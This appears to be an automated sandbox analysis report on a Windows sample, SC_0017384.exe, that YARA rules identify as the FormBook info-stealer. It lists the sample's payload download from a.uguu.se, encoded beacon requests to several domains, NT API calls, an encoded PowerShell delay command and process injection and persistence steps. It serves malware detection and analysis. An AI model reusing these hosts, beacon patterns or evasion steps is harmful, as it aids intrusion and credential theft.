          Source: unknownDNS traffic detected: queries for: a.uguu.se
          Source: global trafficHTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1Host: a.uguu.seConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1Host: a.uguu.seConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1Host: a.uguu.seConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=yKIXTmp5dZbzu0kOoimFYUx0Rf1qUZs10N2udgS/CtBUsUx15VFtNYN9iDnYFh77a6AF4rH5pFyFnuGOqSZvoPy3IjvUZKwOXw== HTTP/1.1Host: www.findmyoriginstory.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=gQIyGWpAOrsnJd0q1zycF3dboTDh0JHEHzF0+87QMzSWBZus6QBaVJZOvsOvWQQjPhLlWjZ0Xc16UyU8zopwRBvkYI23apdf5g== HTTP/1.1Host: www.emprendizajesocial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t4np/?ekDWdXmx=TNgCDQM1NseJ/EyvbqZD4bEVgDXmfsqsK09kjaHK361RIlxqLtgkaoztB9HOqO+kj7AmSjC7tsKJawScM9XI/2xtyFPsJZxirw==&LAIu=TchAG45 HTTP/1.1Host: www.brunaeleandro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=b7otzynn0HmortmfwUeY4rOKK/wDsahaMH4CpYcAMUMZFiGwLHjB+0Oq1wXjzAJPnkBdjV2xmRY1HYDRMeq0YWMvPw2aK61dkA== HTTP/1.1Host: www.madisoncountylincoln.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t4np/?ekDWdXmx=yN4s0tXHCEK4GbHOxK129Y7foRrzq40ElafmJhvJj1LcshAib7Ivom6LHCQSa6JmmrJNk5dNV7FfRE38dwcSsWQdgWRuTjAoEA==&LAIu=TchAG45 HTTP/1.1Host: www.metatv.appConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownHTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49698 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49700 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49701 version: TLS 1.2
          Source: SC_0017384.exe, 00000000.00000002.381865907.0000000001399000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: SC_0017384.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 0_2_016C6AA00_2_016C6AA0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 0_2_016C53900_2_016C5390
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 0_2_016C53170_2_016C5317
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 0_2_016CF3900_2_016CF390
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 0_2_016C774D0_2_016C774D
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 0_2_016C79600_2_016C7960
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_004038533_2_00403853
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_00401B303_2_00401B30
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_004055B33_2_004055B3
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_004206333_2_00420633
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0040BF6F3_2_0040BF6F
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0040BF733_2_0040BF73
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_004057D33_2_004057D3
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_004017D83_2_004017D8
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_004017E03_2_004017E0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017841203_2_01784120
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176F9003_2_0176F900
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_018320A83_2_018320A8
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_018328EC3_2_018328EC
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_018210023_2_01821002
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0183E8243_2_0183E824
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017920A03_2_017920A0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177B0903_2_0177B090
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182DBD23_2_0182DBD2
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01832B283_2_01832B28
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179EBB03_2_0179EBB0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_018322AE3_2_018322AE
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01760D203_2_01760D20
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_018325DD3_2_018325DD
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01832D073_2_01832D07
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177D5E03_2_0177D5E0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01831D553_2_01831D55
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017925813_2_01792581
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177841F3_2_0177841F
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182D4663_2_0182D466
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01831FF13_2_01831FF1
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01786E303_2_01786E30
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01832EF73_2_01832EF7
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182D6163_2_0182D616
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: String function: 0176B150 appears 35 times
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0041E543 NtCreateFile,3_2_0041E543
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0041E5F3 NtReadFile,3_2_0041E5F3
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0041E673 NtClose,3_2_0041E673
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0041E723 NtAllocateVirtualMemory,3_2_0041E723
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_017A9910
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A99A0 NtCreateSection,LdrInitializeThunk,3_2_017A99A0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_017A9860
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9840 NtDelayExecution,LdrInitializeThunk,3_2_017A9840
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_017A98F0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9A50 NtCreateFile,LdrInitializeThunk,3_2_017A9A50
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9A20 NtResumeThread,LdrInitializeThunk,3_2_017A9A20
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_017A9A00
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9540 NtReadFile,LdrInitializeThunk,3_2_017A9540
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A95D0 NtClose,LdrInitializeThunk,3_2_017A95D0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9710 NtQueryInformationToken,LdrInitializeThunk,3_2_017A9710
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9FE0 NtCreateMutant,LdrInitializeThunk,3_2_017A9FE0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_017A97A0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9780 NtMapViewOfSection,LdrInitializeThunk,3_2_017A9780
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_017A9660
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_017A96E0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9950 NtQueueApcThread,3_2_017A9950
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A99D0 NtCreateProcessEx,3_2_017A99D0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017AB040 NtSuspendThread,3_2_017AB040
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9820 NtEnumerateKey,3_2_017A9820
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A98A0 NtWriteVirtualMemory,3_2_017A98A0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9B00 NtSetValueKey,3_2_017A9B00
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017AA3B0 NtGetContextThread,3_2_017AA3B0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9A10 NtQuerySection,3_2_017A9A10
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9A80 NtOpenDirectoryObject,3_2_017A9A80
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9560 NtWriteFile,3_2_017A9560
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017AAD30 NtSetContextThread,3_2_017AAD30
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9520 NtWaitForSingleObject,3_2_017A9520
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A95F0 NtQueryInformationFile,3_2_017A95F0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9770 NtSetInformationFile,3_2_017A9770
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017AA770 NtOpenThread,3_2_017AA770
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9760 NtOpenProcess,3_2_017A9760
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9730 NtQueryVirtualMemory,3_2_017A9730
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017AA710 NtOpenProcessToken,3_2_017AA710
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9670 NtQueryInformationProcess,3_2_017A9670
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9650 NtQueryValueKey,3_2_017A9650
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9610 NtEnumerateValueKey,3_2_017A9610
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A96D0 NtCreateKey,3_2_017A96D0
          Source: SC_0017384.exe, 00000000.00000002.385968571.000000000419A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXnrxjhztihgifcu.dll" vs SC_0017384.exe
          Source: SC_0017384.exe, 00000000.00000000.299213508.0000000000D98000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNevqazdmhd.exe" vs SC_0017384.exe
          Source: SC_0017384.exe, 00000000.00000002.400969818.00000000068FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNevqazdmhd.exe" vs SC_0017384.exe
          Source: SC_0017384.exe, 00000000.00000002.401744017.0000000006980000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameXnrxjhztihgifcu.dll" vs SC_0017384.exe
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SC_0017384.exe
          Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SC_0017384.exe
          Source: SC_0017384.exe, 00000000.00000002.381865907.0000000001399000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SC_0017384.exe
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SC_0017384.exe
          Source: SC_0017384.exe, 00000000.00000002.400969818.00000000068AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SC_0017384.exe
          Source: SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SC_0017384.exe
          Source: SC_0017384.exe, 00000003.00000003.381474937.0000000001523000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SC_0017384.exe
          Source: SC_0017384.exe, 00000003.00000003.383573088.00000000016CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SC_0017384.exe
          Source: SC_0017384.exe, 00000003.00000002.432025851.000000000185F000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SC_0017384.exe
          Source: SC_0017384.exeBinary or memory string: OriginalFilenameNevqazdmhd.exe" vs SC_0017384.exe
          Source: SC_0017384.exeReversingLabs: Detection: 12%
          Source: SC_0017384.exeVirustotal: Detection: 17%
          Source: C:\Users\user\Desktop\SC_0017384.exeFile read: C:\Users\user\Desktop\SC_0017384.exeJump to behavior
          Source: SC_0017384.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SC_0017384.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SC_0017384.exe C:\Users\user\Desktop\SC_0017384.exe
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess created: C:\Users\user\Desktop\SC_0017384.exe C:\Users\user\Desktop\SC_0017384.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess created: C:\Users\user\Desktop\SC_0017384.exe C:\Users\user\Desktop\SC_0017384.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe" Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exeJump to behavior
